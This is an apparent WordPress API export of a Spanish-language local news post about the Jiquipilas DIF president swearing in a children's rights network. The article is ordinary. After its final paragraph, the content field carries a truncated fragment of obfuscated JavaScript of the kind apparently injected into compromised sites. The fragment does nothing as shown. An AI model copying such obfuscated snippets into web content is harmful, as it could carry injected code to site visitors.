{"id":14660,"date":"2024-03-13T03:29:48","date_gmt":"2024-03-13T03:29:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=14660"},"modified":"2024-03-13T03:29:49","modified_gmt":"2024-03-13T03:29:49","slug":"madely-montejo-toma-protesta-a-red-de-ninos-difusores-de-jiquipilas","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=14660","title":{"rendered":"Madely Montejo Toma Protesta a Red de Ni\u00f1os Difusores de Jiquipilas"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"681\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710300531355-1024x681.jpg\" alt=\"\" class=\"wp-image-14661\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710300531355-1024x681.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710300531355-300x199.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710300531355-768x511.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710300531355-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/03\/FB_IMG_1710300531355.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>REDACCI\u00d3N. 12 de marzo del 2024. Jiquipilas, Chiapas. &#8211;  La Presidenta del DIF Madely Montejo Maza encabez\u00f3 la toma de protesta de la instalaci\u00f3n de la Red de Difusores de los derechos del ni\u00f1os, ni\u00f1as y adolescentes, al tiempo que reconoci\u00f3 la importancia de la participaci\u00f3n de este sector del municipio.La primera dama de Jiquipilas, dijo que esto es con la finalidad de promover y crear una red que difunda sus derechos dentro de la familia, escuela, comunidad con el apoyo y reconocimiento de las autoridades correspondientes, para lograr una participaci\u00f3n comunitaria desde su realidad local a fin de dar cumplimiento a la convenci\u00f3n de los derechos de la ni\u00f1ez.Participaron en esta firma, Iris Gabriela Cruz Sandoval en representaci\u00f3n de la delegada regional II valles zoque, Constantino G\u00f3mez Cervantes Director de la Primaria &#8220;Jos\u00e9 Mar\u00eda Mu\u00f1iz&#8221;. De manera protocolaria, firmaron los ni\u00f1os Valeria Zarate Cruz y Sergio Emanuel Gumeta L\u00e1zaro.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>REDACCI\u00d3N. 12 de marzo del 2024. Jiquipilas, Chiapas. &#8211; La Presidenta del DIF Madely Montejo Maza encabez\u00f3 la toma de protesta de la instalaci\u00f3n de la Red de Difusores de los derechos del ni\u00f1os, ni\u00f1as y adolescentes, al tiempo que reconoci\u00f3 la importancia de la participaci\u00f3n de este sector del municipio.La primera dama de Jiquipilas, &hellip;<\/p>\n","protected":false},"author":2,"featured_media":14661,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-14660","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14660","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14660"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14660\/revisions"}],"predecessor-version":[{"id":14662,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/14660\/revisions\/14662"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/14661"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14660"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14660"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14660"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}